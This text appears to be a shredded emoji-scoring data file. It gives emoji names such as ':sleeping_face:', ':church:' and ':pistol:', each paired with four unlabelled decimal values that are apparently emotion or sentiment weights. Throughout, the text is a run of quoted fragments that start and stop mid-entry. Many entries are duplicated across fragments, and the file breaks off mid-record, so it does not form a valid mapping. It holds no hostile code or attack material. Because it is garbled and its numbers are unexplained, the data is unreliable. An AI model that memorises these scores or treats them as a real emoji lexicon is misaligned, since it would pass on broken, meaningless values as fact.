0.342, 0.151,", "0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111, 0.235, 0.225, 0.163], \":ribbon:\":", "0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069,", "[0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249,", "0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214],", "\":Taurus:\": [0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997,", "[0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223,", "[0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258,", "0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\":", "[0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177,", "\":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998,", "0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\":", "0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\":", "[0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28,", "0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998,", "0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\":", "0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139],", "\":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182,", "0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002],", "0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21,", "0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006],", "0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\":", "0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\":", "[0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107,", "0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\":", "[0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182,", "[0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201,", "0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316,", "\":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19,", "\":spade_suit:\": [0.24600000000000002, 0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002,", "0.345, 0.193], \":link:\": [0.258, 0.217, 0.179, 0.262], \":grinning_face_with_smiling_eyes:\": [0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\":", "0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147],", "\":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493,", "0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259,", "\":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165,", "\":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204,", "0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068,", "[0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14,", "\":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276,", "0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\":", "0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348],", "[0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281,", "0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\":", "0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\":", "0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095,", "0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188,", "\":Libra:\": [0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002,", "0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131,", "[0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067,", "[0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102,", "0.299], \":tennis:\": [0.174, 0.198, 0.174, 0.327], \":sleeping_face:\": [0.266, 0.23399999999999999, 0.33, 0.255], \":red_paper_lantern:\": [0.111,", "[0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998,", "0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995],", "\":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276,", "[0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141, 0.304, 0.191,", "0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001],", "0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134], \":person_gesturing_OK:\":", "\":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152, 0.282,", "0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257,", "[0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203,", "[0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11,", "0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002, 0.344] }", "0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22,", "[0.12300000000000001, 0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099,", "\":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531,", "0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083, 0.134],", "\":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188, 0.239,", "0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319,", "0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203],", "\":tanabata_tree:\": [0.16399999999999998, 0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24,", "0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\":", "0.303, 0.27], \":mobile_phone:\": [0.127, 0.26899999999999996, 0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\":", "0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995,", "0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\":", "\":sunrise:\": [0.107, 0.292, 0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179,", "[0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302,", "0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\":", "0.095, 0.242], \":clinking_beer_mugs:\": [0.096, 0.10099999999999999, 0.179, 0.132], \":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\":", "0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\":", "0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233, 0.18899999999999997, 0.282], \":violin:\":", "0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308],", "0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233, 0.302, 0.22699999999999998, 0.214], \":alien:\": [0.15,", "[0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193, 0.191, 0.17300000000000001,", "0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177,", "[0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073,", "0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\":", "[0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225], \":computer_disk:\": [0.19399999999999998, 0.187, 0.32799999999999996,", "0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153,", "0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998],", "0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999,", "\":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392,", "[0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268,", "0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251, 0.256], \":white_medium_star:\": [0.237, 0.175, 0.29, 0.16], \":dashing_away:\":", "\":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299], \":tennis:\": [0.174, 0.198,", "0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267],", "0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\":", "[0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114,", "0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122],", "0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\":", "0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212],", "\":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29, 0.16899999999999998, 0.12, 0.292], \":dog_face:\": [0.13, 0.18,", "\":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289,", "\":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301,", "0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177,", "0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185, 0.21, 0.165, 0.354], \":bank:\":", "[0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337,", "0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002],", "\":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147, 0.185,", "0.31, 0.13], \":heart_with_ribbon:\": [0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\":", "\":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168,", "\":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999,", "[0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122,", "0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166],", "0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\":", "0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\":", "\":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999,", "0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255], \":mushroom:\": [0.188,", "0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098],", "0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\":", "0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122,", "0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\": [0.10800000000000001, 0.195, 0.138, 0.17],", "0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204],", "[0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156,", "0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\":", "[0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503,", "[0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08,", "0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254,", "0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997,", "0.331], \":rice_ball:\": [0.10300000000000001, 0.254, 0.092, 0.262], \":memo:\": [0.147, 0.235, 0.26899999999999996, 0.203], \":face_with_open_mouth:\": [0.271,", "0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005],", "0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996,", "0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\":", "0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\":", "0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\":", "0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341, 0.32799999999999996], \":monkey:\": [0.179, 0.379, 0.083, 0.032],", "0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996],", "[0.065, 0.19899999999999998, 0.28600000000000003, 0.201], \":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248,", "[0.415, 0.308, 0.11, 0.319], \":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081,", "0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141],", "[0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154,", "[0.327, 0.322, 0.17, 0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316,", "\":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\": [0.39899999999999997, 0.21,", "[0.092, 0.168, 0.141, 0.156], \":e-mail:\": [0.26, 0.225, 0.21, 0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003,", "0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303],", "[0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997], \":poultry_leg:\": [0.121, 0.183, 0.215,", "0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215],", "[0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998,", "0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\":", "[0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23], \":unlocked:\": [0.207, 0.20600000000000002, 0.17,", "[0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285,", "0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\":", "0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131,", "[0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075,", "0.153], \":spiral_shell:\": [0.106, 0.301, 0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099,", "\":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154,", "\":sunflower:\": [0.203, 0.243, 0.354, 0.212], \":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171,", "0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\":", "[0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002,", "0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003, 0.52], \":closed_book:\":", "0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257,", "[0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003,", "[0.092, 0.23199999999999998, 0.16399999999999998, 0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175,", "[0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301], \":person_getting_haircut:\": 